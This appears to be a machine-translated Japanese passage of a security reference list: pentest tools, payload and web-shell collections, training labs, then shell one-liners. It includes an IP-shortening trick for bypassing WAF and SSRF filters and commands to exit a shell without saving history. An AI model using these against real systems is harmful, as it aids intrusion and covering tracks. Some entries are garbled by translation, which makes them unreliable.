🔸 @TheManyHatsClub-情報セキュリティに焦点を当てたポッドキャストと、あらゆる分野の個人のグループ。
🔸 @hedgehogsec-ハリネズミサイバー。ジブラルタルとマンチェスターのトップブティック情報セキュリティ会社。
🔸 @NCSC-国家サイバーセキュリティセンター。英国をオンラインで生活し、働くのに最も安全な場所にするのを助けます。
🔸 @Synacktiv- ITセキュリティの専門家。

▪️歴史の一部

  🔸ARLで物事を行う方法-モデムの設定方法、イメージのスキャン方法、CD-ROMの記録方法など。*

▪️その他 __________

  🔸Diffie-Hellman Key Exchange (short version) - Diffie-Hellman Key Exchange の仕組み。

ハッキング/侵入テスト[TOC]

▪️ペンテスターアーセナルツール

  🔸Sandcat Browser-すでに組み込まれた高度な機能がたくさんある侵入指向のブラウザMetasploit
🔸-ペンテストシステム、Webなどのツールとフレームワークには、すぐに使用できるエクスプロイトがたくさん含まれています。
🔸Burp Suite-Webアプリのセキュリティをテストし、プロキシを傍受して再生、注入、スキャン、ファズを行うためのツール。
🔸OWASP Zed攻撃プロキシ-HTTPリクエストを再生、注入、スキャン、ファジングするためのプロキシを傍受します。
🔸w3af- は、Web アプリケーションの攻撃および監査フレームワークです。
🔸mitmproxy-侵入テスター用のインタラクティブなTLS対応インターセプトHTTPプロキシ。
🔸Nikto2-複数のアイテムのWebサーバーに対して包括的なテストを実行するWebサーバースキャナー。
🔸sqlmap-SQLインジェクションの欠陥を検出して悪用するプロセスを自動化するツール。
🔸Recon-ng- は、Python で書かれたフル機能の Web 偵察フレームワークです。
🔸AutoRecon-は、サービスの自動列挙を実行するネットワーク偵察ツールです。
🔸ファラデー - 統合されたマルチユーザーペンテスト環境。
🔸フォトン-OSINT用に設計された信じられないほど高速なクローラー。
🔸XSStrike - 最も高度な XSS 検出スイート。
🔸Sn1per-攻撃的なセキュリティ専門家のための自動化されたペンテストフレームワーク。
🔸vuls- は、Linux、FreeBSD、およびその他のためのエージェントレスの脆弱性スキャナーです。
🔸Tsunami-は、拡張可能なプラグインシステムを備えた汎用ネットワークセキュリティスキャナーです。
🔸アクアトーン - ドメインフライオーバーのためのツール。
🔸ビルサイファー - ウェブサイトまたはIPアドレスのための情報収集ツール。
🔸WhatWaf-Webアプリケーションのファイアウォールと保護システムを検出してバイパスします。
🔸コルシー - CORSの設定ミススキャナー。
🔸Raccoon-は、偵察と脆弱性スキャンのための高性能の攻撃的なセキュリティツールです。
🔸dirhunt - ブルートフォースなしでWebディレクトリを検索します。
🔸ジョン・ザ・リッパー-は高速パスワードクラッカーであり、現在、Unix、Windows、およびその他の多くのフレーバーで利用できます。
🔸ハッシュキャット - 世界最速かつ最先端のパスワード回復ユーティリティ。
🔸p0f- は、偶発的な TCP/IP 通信の背後にいるプレイヤーを識別するためのツールです。
🔸ssh_scan- プロトタイプの SSH 構成およびポリシー スキャナー。
🔸LeakLooker-オープンデータベースを見つける-エクスプロイトデータベースを搭載した Binaryedge.io
🔸エクスプロイトデータベースから検索可能なアーカイブアセ。
🔸getsploit- は、エクスプロイトを検索およびダウンロードするためのコマンドラインユーティリティです。
🔸CTF-tools-セキュリティ調査ツール用のいくつかのセットアップスクリプト。
🔸pwntools-CTFフレームワークとエクスプロイト開発ライブラリ。
🔸セキュリティツール-主にPythonで作成された小さなセキュリティツールのコレクション。CTF、ペンテストなど。
🔸ペンテストパッケージ- はペンテストスクリプトのパッケージです。
🔸python-pentest-tools-侵入テスターのためのpythonツール。
🔸fuzzdb-ブラックボックスアプリケーションフォールトインジェクションのための攻撃パターンとプリミティブの辞書。
🔸AFL- は、Google が管理するフリーソフトウェアのファザーです。
🔸AFL++- はコミュニティパッチ付きの AFL です。
🔸syzkaller- は、教師なし、カバレッジガイド付きカーネルファザーです。
🔸pwndbg-GDBを使用したエクスプロイト開発とリバースエンジニアリングが簡単になりました。
🔸GDB PEDA- Python は GDB のための開発援助を悪用します。
🔸IDA - マルウェアのリバースエンジニアリングに役立つマルチプロセッサ逆アセンブラおよびデバッガ。
🔸radare2-バイナリをリバースエンジニアリングおよび分析するためのフレームワーク。
🔸ルータースプロイト-組み込みデバイス用のエクスプロイトフレームワーク。
🔸Ghidra- は、ソフトウェアリバースエンジニアリング (SRE) フレームワークです。
🔸Cutter- は、Ghidra のデコンパイラを統合した SRE プラットフォームです。
🔸Vulnreport - Salesforce 製品セキュリティによるオープンソースの侵入テスト管理および自動化プラットフォーム。
🔸メンタリスト-は、カスタムワードリストを生成するためのグラフィカルツールです。
🔸Archerysec-脆弱性の評価と管理は、スキャンの実行と脆弱性の管理に役立ちます。
🔸Osmedeus-偵察と脆弱性スキャンのための完全に自動化された攻撃的なセキュリティツール。
🔸牛肉-ブラウザエクスプロイトフレームワークプロジェクト。
🔸オートスプロイト - 自動化されたマスエクスプロイザー。
🔸SUDO_KILLER- は、sudo ルールの設定ミスと脆弱性を特定して悪用するためのツールです。
🔸ヤラ-パターンマッチングスイスナイフ。
🔸ミカッツ - Windowsのセキュリティで遊ぶための小さなツール。
🔸シャーロック-ソーシャルネットワーク全体でユーザー名でソーシャルメディアアカウントを探します。
🔸OWASP脅威ドラゴン-脅威モデル図を作成し、可能なTHを記録するために使用されるツールです食べる。

▪️ペンテストのブックマークコレクション

  🔸PTES-侵入テストの実行標準。
🔸ペンテストマインドマップ-脆弱なアプリやシステムを備えた素晴らしいマインドマップ。
🔸WebAppsセキュリティテストマインドマップ - WebAppsセキュリティテストのための信じられないほどのマインドマップ。
🔸ブルートXSS-クロスサイトスクリプティングの技術を習得します。
🔸XSSチートシート-WAFとフィルターをバイパスするのに役立つ多くのベクトルが含まれています。
🔸攻撃的なセキュリティブックマーク - セキュリティブックマークコレクション、作成者がOSCPに合格する必要があるすべてのもの。
🔸素晴らしいペンテストチートシート-ペネトレーションテストに役立つチートシートのコレクション。
🔸HackWithGithubによる素晴らしいハッキング-ハッカー、ペンテスター、セキュリティ研究者のための素晴らしいリスト。
🔸carpedm20による素晴らしいハッキング-素晴らしいハッキングチュートリアル、ツール、リソースの厳選されたリスト。
🔸素晴らしいハッキングリソース-あなたをより良くするためのハッキング/侵入テストリソースのコレクション。
🔸素晴らしいペンテスト-素晴らしい侵入テストリソース、ツール、その他の光沢のあるもののコレクション。
🔸素晴らしいハッキングツール-は、素晴らしいハッキングツールの厳選されたリストです。
🔸チートシートのハッキング-ハッキングとペンテストのメモを作成します。
🔸ブラックハット-アーセナル-ツール-公式のブラックハットアーセナルセキュリティツールリポジトリ。
🔸侵入テストとWebAppチートシート-情報セキュリティ関連のチートシートの完全なリスト。
🔸サイバーセキュリティリソース-何千ものサイバーセキュリティ関連の参照とリソースが含まれています。
🔸ペンテストブックマーク-ペンテストブログがたくさんあります。
🔸チートシート-神-侵入テストリファレンスバンク-OSCP / PTP & PTX Cheatsheet。
🔸ThreatHunter-プレイブック-狩猟キャンペーンの技術と仮説の開発を支援します。
🔸初心者-ネットワーク-ペンテスト-初心者ネットワークペネトレーションコースのメモ。
🔸OSCPRepo- は、著者が OSCP の準備のために収集しているリソースのリストです。
🔸PayloadsAllTheThings-WebアプリケーションセキュリティとPentest/CTF.payloads
🔸の便利なペイロードとバイパスのリスト-すべてのペイロードをgit!Web 攻撃ペイロードのコレクション。
🔸コマンドインジェクションペイロードリスト-コマンドインジェクションペイロードリスト
🔸素晴らしいShodan検索クエリ-Shodanにプラグインするための優れた検索クエリ。
🔸AwesomeXSS - は Awesome XSS リソースのコレクションです。
🔸php-webshells- 一般的なphpウェブシェル。
🔸ペネトレーションテストツールチートシート-典型的な侵入テストのクイックリファレンスの概要。
🔸OWASPチートシートシリーズ-特定のアプリケーションセキュリティトピックに関する価値の高い情報のコレクションです。
🔸OWASP依存関係チェック-は、OWASPトップ10 2013エントリのオープンソースソリューションです。
🔸OWASPプロアクティブコントロール-OWASPトップ10プロアクティブコントロール2018。
🔸PENTESTING-BIBLE- ハッキング&ペネトレーションテスト&レッドチーム&サイバーセキュリティリソース。
🔸Pentest-wiki-は、ペンテスター/研究者向けの無料のオンラインセキュリティ知識ライブラリです。
🔸デフコンメディアサーバー - デフコンからの素晴らしいもの。
🔸素晴らしいマルウェア分析-素晴らしいマルウェア分析ツールとリソースの厳選されたリスト。
🔸SQLインジェクションチートシート - SQLインジェクションのさまざまなバリエーションに関する詳細な技術的事項。
🔸Entersoftナレッジベース-脆弱性に関する優れた詳細なリファレンス。
🔸HTML5セキュリティチートシート - HTML5関連のXSS攻撃ベクトルのコレクション。
🔸XSS文字列エンコーダー-XSSに対して入力検証フィルターをチェックするためのXSSコードを生成します。
🔸go awayビン - 攻撃者がローカルのセキュリティ制限をバイパスするために悪用できるUnixバイナリのリスト。
🔸Guifre Ruizノート-セキュリティ、システム、ネットワーク、およびペンテストのチートシートのコレクション。
🔸SSRF ヒント - SSRF ヒントのコレクション。
🔸シェルストームレポCTF-CTFの素晴らしいアーカイブ.
🔸ctf-CTF(キャプチャザフラグ)の記事、コードスニペット、メモ、スクリプト。
🔸My-CTF-Web-Challenge-CTFウェブチャレンジのコレクション。
🔸MSTG-モバイルセキュリティテストガイド(MSTG)は、モバイルアプリのセキュリティテストの包括的なマニュアルです。
🔸内部ペンテストプレイブック-内部ネットワーク侵入テストの最も一般的な事柄に関するメモ.
🔸KeyHacks-バグ報奨金プログラムによって漏洩したAPIキーをすばやくチェックする方法を示します。
🔸securitum/research-Securitumによって実行されるセキュリティ研究のさまざまな概念実証。
🔸パブリックペンテストレポート-は、いくつかのコンサルティングセキュリティグループによってリリースされたパブリックペンテストレポートのリストです。
🔸awesome-bug-bounty-は、利用可能なバグバウンティの包括的な厳選されたリストです。
🔸バグ報奨金参照- は、バグ報奨金の書き込みのリストです。
🔸素晴らしいバグバウンティの書き込み<</b20> / b1157>-は、バグバウンティの記事の厳選されたリストです。バグ報奨金のの書き込みのリスト(2012-2020)。-セキュリティへの素晴らしい旅。

▪️バックドア/エクスプロイト

  🔸PHPバックドア - PHPバックドアのコレクション。教育またはテストのみを目的としています。

▪️ワードリストと脆弱なパスワード

  🔸ウィークパス-あらゆる種類のブルートフォースのためにワードリストを見つけるか、それらの力を一度に解き放ちます!
🔸Hashes.org-は、多くの比類のない技術を組み込んだ無料のオンラインハッシュ解決サービスです。
🔸SecLists-セキュリティ評価中に使用される複数のタイプのリストのコレクションで、1か所に収集されます。
🔸考えられる単語リスト-パスワードの生成とテストのために最初に作成された確率でソートされます。
🔸頭蓋骨セキュリティパスワード-パスワード辞書と漏洩したパスワードリポジトリ。
🔸ポーランド語プレミアム辞書 - フォーラム bezpieka.org 上のチームによって作成された公式辞書。*1
🔸統計的に可能性が高いユーザ名リスト-統計的に可能性が高いユーザ名リストを作成するための単語リスト。

▪️バウンティプラットフォーム

  🔸YesWeHack-インフォセックジョブを備えたバグ報奨金プラットフォーム。
🔸Openbugbounty-セキュリティ研究者が任意のWebサイトで脆弱性を報告できるようにします。
🔸ハッカーワン -最も関連性の高いセキュリティ問題を明らかにするためのグローバルハッカーコミュニティ。
🔸バグクラウド - 企業向けのクラウドソーシングされたサイバーセキュリティ。
🔸Crowdshield-クラウドソーシングされたセキュリティとバグ報奨金管理。
🔸Synack-クラウドソーシングされたセキュリティ&バグ報奨金プログラム、クラウドセキュリティインテリジェンスプラットフォームなど。
🔸ハックトロフィー-バグ報奨金プラットフォーム。

▪️Web トレーニング アプリ (ローカル インストール)

  🔸OWASP-VWAD-すべての既知の脆弱なWebアプリケーションの包括的で適切に維持されたレジストリ。
🔸DVWA - 非常に脆弱なPHP / MySQLウェブアプリケーション。
🔸メタスプロイタブル2-セキュリティ研究者の間で脆弱なWebアプリケーション。
🔸metasploitable3- は、大量のセキュリティ脆弱性を備えたゼロから構築された VM です。
🔸DSVW-は、100行未満のコードで記述された意図的に脆弱なWebアプリケーションです。
🔸OWASP Mutillidae II-フリーでオープンソースの、意図的に脆弱なWebアプリケーション。
🔸OWASPジュースショッププロジェクト-存在する最もバグのない脆弱なアプリケーション。
🔸OWASP Node jsヤギプロジェクト-OWASPトップ10のセキュリティリスクは、Node.jsを使用して開発されたWebアプリケーションに適用されます。
🔸ジューシー-CTF-OWASPジュースショップで旗とセキュリティトレーニングをキャプチャします。
🔸セキュリティシェパード-Webおよびモバイルアプリケーションセキュリティトレーニングプラットフォーム。
🔸セキュリティ忍者-オープンソースのアプリケーションセキュリティトレーニングプログラム。
🔸hackazon-最新の脆弱なWebアプリ.
🔸dvna-脆弱なNodeJSアプリケーション。
🔸django-DefectDojo-は、オープンソースアプリケーションの脆弱性の相関およびセキュリティオーケストレーションツールです。
🔸グーグルグリュイエール - ウェブアプリケーションのエクスプロイトと防御。
🔸Bodhi-は、クライアント側のWebの脆弱性の悪用を学ぶことに焦点を当てた遊び場です。
🔸Websploit - 複数の脆弱なアプリケーションを 1 つの環境で組み合わせることを目的とした単一の VM ラボ。
🔸vulhub-ドッカー作成に基づく事前構築済みの脆弱な環境。
🔸CloudGoat 2 - 新しく改良された「Vulnerable by Design」 AWS デプロイツール。
🔸secDevLabs-は、実用的な方法で安全なWeb開発を学ぶための実験室です。
🔸CORS-脆弱-ラボ-脆弱なコードとそのエクスプロイトコードのサンプル。
🔸RootTheBox- ハッカーのゲーム(CTFスコアボード&ゲームマネージャー)。
🔸KONTRA- Application Security Training (OWASP Top Web & Api).

▪️ラボ(倫理的なハッキングプラットフォーム/トレーニング/ CTF)

  🔸攻撃的なセキュリティ-10年以上にわたる真のパフォーマンスベースの侵入テストトレーニング。
🔸ハックザボックス-侵入テストスキルをテストできるオンラインプラットフォーム。
🔸ハッキングラボ-オンライン倫理的ハッキング、コンピュータネットワーク、セキュリティチャレンジプラットフォーム。
🔸pwnable.kr-さまざまなPWNチャレンジを提供する非営利のウォーゲームサイト。
🔸Pwnable.tw-は、ハッカーがバイナリエクスプロイトスキルをテストおよび拡張するためのウォーゲームサイトです。
🔸picoCTFは、中高生を対象とした無料のコンピュータセキュリティゲームです。
🔸CTFlearn-は、倫理的なハッカーがサイバーセキュリティの知識を学び、実践するのに役立つように構築されたオンラインプラットフォームです。
🔸ctftime-CTFアーカイブと場所, 別のCTF関連の情報を取得できる場所.
🔸シレジアセキュリティラボ-高品質のセキュリティテストサービス。
🔸実用的なペンテストラボ-ペンテストラボ、ハッキングスキルを次のレベルに引き上げます。
🔸Root Me-ハッキングスキルをトレーニングするための高速、簡単、手頃な方法。
🔸rozwal.to-ペンテストスキルをトレーニングするための優れたプラットフォーム。
🔸TryHackMe-サイバーセキュリティの学習が簡単になりました。
🔸Hackxor-は、あらゆる能力のプレイヤーがスキルを伸ばすのに役立つように設計された、現実的なWebアプリケーションハッキングゲームです。
🔸最初に自分をハックする-それは厄介なアプリの秒穴でいっぱいです。
🔸OverTheWire-は、楽しいゲームの形でセキュリティの概念を学び、実践するのに役立ちます。
🔸ウィザードラボ-はオンラインです 侵入テストラボ.
🔸ペンテスターラボ -脆弱性のテストと理解に使用できる脆弱なシステムを提供します。
🔸RingZer0-ハッキングスキルをテストおよび改善するために設計された大量の課題。
🔸try2hack-エンターテインメントのためのいくつかのセキュリティ指向の課題。
🔸Ubeeri - 事前構成済みのラボ環境。
🔸Pentestit-法的な侵入テストとペンテストスキルの向上のために、実際の企業のITインフラストラクチャをエミュレートします。
🔸マイクロ腐敗-Webインターフェイスで行われる逆転の課題。
🔸Crackmes-クラックミーをダウンロードして、リバースエンジニアリングスキルを向上させます。
🔸DomGoat-DOM XSSセキュリティ学習および実践プラットフォーム。
🔸ステレオタイプの課題-今日あなたのウェブハッキング技術をアップグレードしてください!
🔸Vulnhub-誰でもデジタルセキュリティの実践的な「実践的」経験を積むことができます。
🔸W3チャlls-は、さまざまなコンピューターの課題を提供する侵入テストトレーニングプラットフォームです。
🔸RingZer0 CTF-ハッキングスキルをテストおよび改善するために設計された多数の課題を提供します。
🔸Hack.me-教育目的で脆弱なWebアプリを構築、ホスト、共有できるプラットフォーム。
🔸ハックこれ!-ハッキング、ダンプ、改ざんがどのように実行されるかを発見し、Webサイトを保護します。
🔸エニグマグループWebアプリトレーニング-これらの課題は、OWASPトップ10プロジェクトにリストされているエクスプロイトをカバーしています。
🔸リバースエンジニアリングの課題-課題、演習、問題、タスク-レベル別、タイプ別など。
🔸0x00sec-ハッカーの本拠地-マルウェア、リバースエンジニアリング、およびコンピュータサイエンス。
🔸私たちは、さまざまなチャレンジタイプが存在します。
🔸ハッカーゲートウェイ-は、スキルをテストしたいハッカーにとって頼りになる場所です。
🔸Hacker101-は、Webセキュリティのための無料のクラスです。
🔸contained.af-コンテナ、機能、およびシステムコールについて学ぶための愚かなゲーム。
🔸flAWSチャレンジ!- AWSを使用する際のよくある間違いや落とし穴について学ぶ一連のレベル。
🔸CyberSec WTFは、報奨金の書き込みから派生したWebハッキングの課題を提供します。
🔸CTFチャレンジ-CTFウェブアプリのチャレンジ。
🔸gCTF - Google CTF 2017で使用されるほとんどの課題。
🔸このサイトをハックする-ハッカーのための無料で安全で合法的なトレーニングの場です。
🔸Attack & Defense- はブラウザベースのクラウドラボです。
🔸クリプトハック-現代の暗号化を学ぶための楽しいプラットフォーム。
🔸クリプトパル-クリプトパルの暗号の課題。

▪️CTF プラットフォーム

  🔸fbctf-キャプチャーザフラッグコンテストを主催するプラットフォーム。
🔸ctfスコアボード-キャプチャーザフラッグコンペティションのスコアボード。

▪️その他の資料

  🔸バグクラウド大学 - 研究者コミュニティ向けのオープンソース教育コンテンツ。
🔸OSCPRepo-OSCPの準備のために収集しているリソースとスクリプトのリスト。
🔸OWASP トップ 10: 実際の例-実際の例を使用して Web アプリをテストします (2 部構成のシリーズ)。
🔸phrack.org-いくつかの尊敬されているハッカーや他の思想家からの記事の素晴らしいコレクション。
🔸実践的-倫理的-ハッキング-リソース-TCMのUdemyコースからのリソースの編集。

あなたの毎日の知識とニュース[目次]

▪️RSSリーダー

  🔸Feedly-あなたにとって重要なものを整理し、読み、共有します。
🔸Inoreader-フィードリーに似ていますが、RSSから取得したものをフィルタリングすることをサポートしています。

▪️IRC チャンネル

  🔸 #hackerspaces-ハッカースペースIRCチャネル。

▪️安全

  🔸ハッカーニュース-セキュリティの専門家やハッカーの認識を促進することに専念する主要なニュースソース。
🔸最新のハッキングニュース-倫理的なハッカーに最新のハッキングニュース、エクスプロイト、脆弱性を提供します。
🔸セキュリティニュースレター - 毎週のダイジェスト(電子メール通知)としてのセキュリティニュース。
🔸Googleオンラインセキュリティブログ-インターネット上のセキュリティと安全性に関するGoogleの最新ニュースと洞察。
🔸Qualys ブログ - 専門家のネットワーク セキュリティに関するガイダンスとニュース。
🔸DARKリリース-情報セキュリティコミュニティを接続します。
🔸ダークネット-最新のハッキングツール、ハッカーニュース、サイバーセキュリティのベストプラクティス、倫理的なハッキングと侵入テスト。
🔸公開公開-最近公開されたバグについて最新の状態に保つ公開ウォッチャー。
🔸Reddit-ハッキング-ハッキングとハッカー専用のサブレディット。
🔸パケットストーム-情報セキュリティサービス、ニュース、ファイル、ツール、エクスプロイト、アドバイザリ、ホワイトペーパー。
🔸Sekurak-セキュリティ、侵入テスト、脆弱性、その他多数(PL / EN)について。
🔸nf.sec-Linuxオペレーティングシステムのセキュリティ(PL)の基本的な側面とメカニズム。

▪️その他/オールインワン

  🔸変更ログ-ハッカーのコミュニティです。開発者とハッカーのためのニュースとポッドキャスト。

その他のチートシート[目次]

独自のDNSサーバーを構築する

  🔸バインドされていないDNSチュートリアル-検証、再帰、およびキャッシュDNSサーバー。
🔸Fedoraのノットリゾルバー-Fedoraのノットリゾルバーを使用して、より高速で安全なDNS解決を取得する方法。
🔸独自の DNS-over-HTTPS (DoH) サーバーをセットアップするための DNS-over-HTTPS - チュートリアル。
🔸dns-over-https- DNS over HTTPSの漫画の紹介。
🔸DNS over TLS - DoH サーバーに続いて、DNS over TLS (DoT) サーバーをセットアップします。
🔸DNSサーバー-自分のDNSサーバーを実行する方法(および理由)。

独自の認証局を構築する

  🔸OpenSSL 認証局 - OpenSSL ツールを使用して独自の認証局 (CA) を構築します。
🔸ステップ CA 認証局 - オープンソースのステップ CA を使用して独自の認証局 (CA) を構築します。

独自のシステム/仮想マシンを構築する

  🔸os-チュートリアル-OSを最初から作成する方法。
🔸独自の仮想マシンを作成する - 独自の仮想マシン (VM) を作成する方法。
🔸x86ベアメタルの例-x86システムプログラミングを学ぶための数十の最小オペレーティングシステム。
🔸シンプルコンピュータ-J.クラークスコットによる「しかし、それはどのように知っているのですか?」のスコットCPU。
🔸リトルオスブック - OS開発に関する小さな本。

DNS サーバーの一覧 (プライバシー)
IPアドレス リンク
84.200.69.80
dns.watch
94.247.43.254
opennic.org
64.6.64.6
verisign.com
89.233.43.71
censurfridns.dk
1.1.1.1
cloudflare.com
94.130.110.185
dnsprivacy.at
トップブラウザ拡張機能
拡張機能名 説明: __________
IPvFoo
すべてのページ要素のサーバー IP アドレスと HTTPS 情報を表示します。
FoxyProxy
プロキシサーバーにアクセスするためのブラウザの設定を簡素化します。
HTTPS Everywhere
多くのサイトで HTTPS セキュリティを自動的に使用します。
uMatrix
ポイント&クリックすると、ブラウザによるリクエストのクラスを禁止/許可できます。
uBlock Origin
効率的なブロッカー:メモリとCPUフットプリントにやさしい。
Session Buddy
ブラウザのタブとブックマークを簡単に管理できます。
SuperSorter
ブックマークを再帰的に並べ替えたり、重複を削除したり、フォルダーをマージしたりできます。
Clear Cache
キャッシュと閲覧データをクリアします。
d3coder
さまざまな種類のエンコーディング用のエンコーディング/デコードプラグイン。
Web Developer
さまざまな Web 開発者ツールを含むツール バー ボタンを追加します。
ThreatPinch Lookup
脅威インテリジェンスのホバー ツール ヒントを追加します。
トップげっぷエクステンション
拡張機能名 説明: __________
Active Scan++
Burpのアクティブおよびパッシブスキャン機能を拡張します。
Autorize
承認の適用を自動的に検出します。
AuthMatrix
必要なレベルのアクセス権限を定義するための単純なマトリックスグリッド。
Logger++
すべての Burp ツールの要求と応答を並べ替え可能なテーブルに記録します。
Bypass WAF
一部の WAF デバイスをバイパスするのに役立つヘッダーを追加します。
JSON Beautifier
HTTP メッセージ ビューアー内の JSON コンテンツを美しくします。
JSON Web Tokens
Burp が JSON Web トークンをデコードおよび操作できるようにします。
CSP Auditor
応答の CSP ヘッダーを表示し、CSP の弱点を受動的に報告します。
CSP-Bypass
既知のバイパスを含む CSP ヘッダーをパッシブにスキャンします。
Hackvertor
タグベースの構成を使用してデータを変換し、さまざまなエンコードを適用します。
HTML5 Auditor
危険な HTML5 機能の使用をスキャンします。
Software Vulnerability Scanner
監査 API に基づく脆弱性スキャナー vulners.com。
Turbo Intruder
強力なブルートフォースツールです。
Upload Scanner
さまざまな形式のペイロードを織り交ぜた、さまざまなファイルタイプをアップロードします。
モジラのFirefoxのアドレスバーをハック

Firefox のアドレスバーでは、用語の前後に特殊文字を入力することで結果を制限できます:

  • ^
    - 閲覧履歴の一致
  • *
    - あなたのブックマーク内の一致のために。
  • %
    -現在開いているタブの一致の場合。
  • #
    - ページタイトルの一致用。
  • @
    - ウェブアドレスの一致用。
クロームの隠しコマンド
  • chrome://chrome-urls
    - すべてのコマンドのリスト
  • chrome://flags
    - 実験と開発機能を有効にする
  • chrome://interstitials
    - エラーと警告
  • chrome://net-internals
    - ネットワーク内部(イベント、DNS、キャッシュ)
  • chrome://network-errors
    - ネットワークエラー
  • chrome://net-export
    - 将来のネットワークアクティビティをファイルに記録し始めます
  • chrome://safe-browsing
    - 安全なブラウジングオプション
  • chrome://user-actions
    - すべてのユーザーアクションを記録する
  • chrome://restart
    - クロームを再起動します
  • chrome://dino
    - ERR_INTERNET_DISCONNECTED...
  • cache:<website-address>
    - Webページのキャッシュされたバージョンを表示する
IP アドレスを短縮して WAF をバイパスする (0xInfection)

IP アドレスは、ゼロを削除することで短縮できます。

http://1.0.0.1 → http://1.1
http://127.0.0.1 → http://127.1
http://192.168.0.1 → http://192.168.1

http://0xC0A80001 or http://3232235521 → 192.168.0.1
http://192.168.257 → 192.168.1.1
http://192.168.516 → 192.168.2.4

これにより、入力としてのIPがブラックリストに登録されるSSRF、オープンリダイレクトなどのWAFフィルターがバイパスされます。

詳細については、「URL とマジック IP アドレスのショートカットを隠す方法」を参照してください。

ハッシュ、暗号化、エンコーディング(ミハル・シュパチェク著))

ハッシング

プレーンテキスト ハッシュ
ハッシュプレーンテキスト➡️

対称暗号化

平文暗号文 平文暗号文➡️🔑➡️
⬅️🔑⬅️
(🔑共有鍵)

非対称暗号化

平文➡️🔑➡️暗号文 平文暗号文
⬅️〽️⬅️
(🔑公開鍵、〽️秘密鍵)

エンコーディング

エンコードされた
テキスト➡️エンコードされたテキスト⬅️

シェルワンライナー[目次]

目次
ツール:ターミナル[つーる:えっく
出口なしでシェルをリロードする
exec $SHELL -l
すべてのサブプロセスを実行したままシェルを閉じる
disown -a && exit
シェル履歴を保存せずに終了する
kill -9 $$
unset HISTFILE && exit
分岐条件を実行する
true && echo success
false || echo failed
パイプ標準出力と標準エラーを別々のコマンドに
some_command > >(/bin/cmd_for_stdout) 2> >(/bin/cmd_for_stderr)
stdoutとstderrをそれぞれ別々のファイルにリダイレクトし、両方を画面に出力します
(some_command 2>&1 1>&3 | tee errorlog ) 3>&1 1>&2 | tee stdoutlog
最も頻繁に使用するコマンドのリスト
history | \
awk '{CMD[$2]++;count++;}END { for (a in CMD)print CMD[a] " " CMD[a]/count*100 "% " a;}' | \
grep -v "./" | \
column -c3 -s " " -t | \
sort -nr | nl |  head -n 20
バッシュ履歴を滅菌する
function sterile() {

  history | awk '$2 != "history" { $1=""; print $0 }' | egrep -vi "\
curl\b+.*(-E|--cert)\b+.*\b*|\
curl\b+.*--pass\b+.*\b*|\
curl\b+.*(-U|--proxy-user).*:.*\b*|\
curl\b+.*(-u|--user).*:.*\b*
.*(-H|--header).*(token|auth.*)\b+.*|\
wget\b+.*--.*password\b+.*\b*|\
http.?://.+:.+@.*\
" > $HOME/histbuff; history -r $HOME/histbuff;

}

export PROMPT_COMMAND="sterile"

また見てください:コマンド履歴の資格情報を検閲するための素朴なユーティリティ

ファイルをすばやくバックアップする
cp filename{,.orig}
ファイルを空にする (サイズを 0 に切り捨てる)
>filename
特定のファイル拡張子に一致しないフォルダ内のすべてのファイルを削除する
rm !(*.foo|*.bar|*.baz)
複数行の文字列をファイルに渡す
# cat  >filename ... - overwrite the file
# cat >>filename ... - append to a file
cat > filename << __EOF__
data data data
__EOF__
vimを使用してリモートホスト上のファイルを編集する
vim scp://user@host//etc/fstab
ディレクトリを作成し、同時にディレクトリを変更する
mkd() { mkdir -p "$@" && cd "$@"; }
大文字のファイルを小文字のファイルに変換する
rename 'y/A-Z/a-z/' *
端末全体に文字の行を印刷する
printf "%`tput cols`s" | tr ' ' '#'
Show shell history without line numbers
history | cut -c 8-
fc -l -n 1 | sed 's/^\s*//'
Run command(s) after exit session
cat > /etc/profile << __EOF__
_after_logout() {

  username=$(whoami)

  for _pid in $(ps afx | grep sshd | grep "$username" | awk '{print $1}') ; do

    kill -9 $_pid

  done

}
trap _after_logout EXIT
__EOF__
Generate a sequence of numbers
for ((i=1; i<=10; i+=2)) ; do echo $i ; done
# alternative: seq 1 2 10

for ((i=5; i<=10; ++i)) ; do printf '%02d\n' $i ; done
# alternative: seq -w 5 10

for i in {1..10} ; do echo $i ; done
Simple Bash filewatching
unset MAIL; export MAILCHECK=1; export MAILPATH='$FILE_TO_WATCH?$MESSAGE'

Tool: busybox
Static HTTP web server
busybox httpd -p $PORT -h $HOME [-c httpd.conf]

Tool: mount
Mount a temporary ram partition
mount -t tmpfs tmpfs /mnt -o size=64M
  • -t
    - filesystem type
  • -o
    - mount options
Remount a filesystem as read/write
mount -o remount,rw /

Tool: fuser
Show which processes use the files/directories
fuser /var/log/daemon.log
fuser -v /home/supervisor
Kills a process that is locking a file
fuser -ki filename
  • -i
    - interactive option
Kills a process that is locking a file with specific signal
fuser -k -HUP filename
  • --list-signals
    - list available signal names
Show what PID is listening on specific port
fuser -v 53/udp
Show all processes using the named filesystems or block device
fuser -mv /var/www

Tool: lsof
Show process that use internet connection at the moment
lsof -P -i -n
Show process that use specific port number
lsof -i tcp:443
Lists all listening ports together with the PID of the associated process
lsof -Pan -i tcp -i udp
List all open ports and their owning executables
lsof -i -P | grep -i "listen"
Show all open ports
lsof -Pnl -i
Show open ports (LISTEN)
lsof -Pni4 | grep LISTEN | column -t
List all files opened by a particular command
lsof -c "process"
View user activity per directory
lsof -u username -a +D /etc
Show 10 largest open files
lsof / | \
awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | \
sort -n -u | tail | column -t
Show current working directory of a process
lsof -p <PID> | grep cwd

Tool: ps
Show a 4-way scrollable process tree with full details
ps awwfux | less -S
Processes per user counter
ps hax -o user | sort | uniq -c | sort -r
Show all processes by name with main header
ps -lfC nginx

Tool: find
Find files that have been modified on your system in the past 60 minutes
find / -mmin 60 -type f
Find all files larger than 20M
find / -type f -size +20M
Find duplicate files (based on MD5 hash)
find -type f -exec md5sum '{}' ';' | sort | uniq --all-repeated=separate -w 33
Change permission only for files
cd /var/www/site && find . -type f -exec chmod 766 {} \;
cd /var/www/site && find . -type f -exec chmod 664 {} +
Change permission only for directories
cd /var/www/site && find . -type d -exec chmod g+x {} \;
cd /var/www/site && find . -type d -exec chmod g+rwx {} +
Find files and directories for specific user/group
# User:
find . -user <username> -print
find /etc -type f -user <username> -name "*.conf"

# Group:
find /opt -group <group>
find /etc -type f -group <group> -iname "*.conf"
Find files and directories for all without specific user/group
# User:
find . \! -user <username> -print

# Group:
find . \! -group <group>
Looking for files/directories that only have certain permission
# User
find . -user <username> -perm -u+rw # -rw-r--r--
find /home -user $(whoami) -perm 777 # -rwxrwxrwx

# Group:
find /home -type d -group <group> -perm 755 # -rwxr-xr-x
Delete older files than 60 days
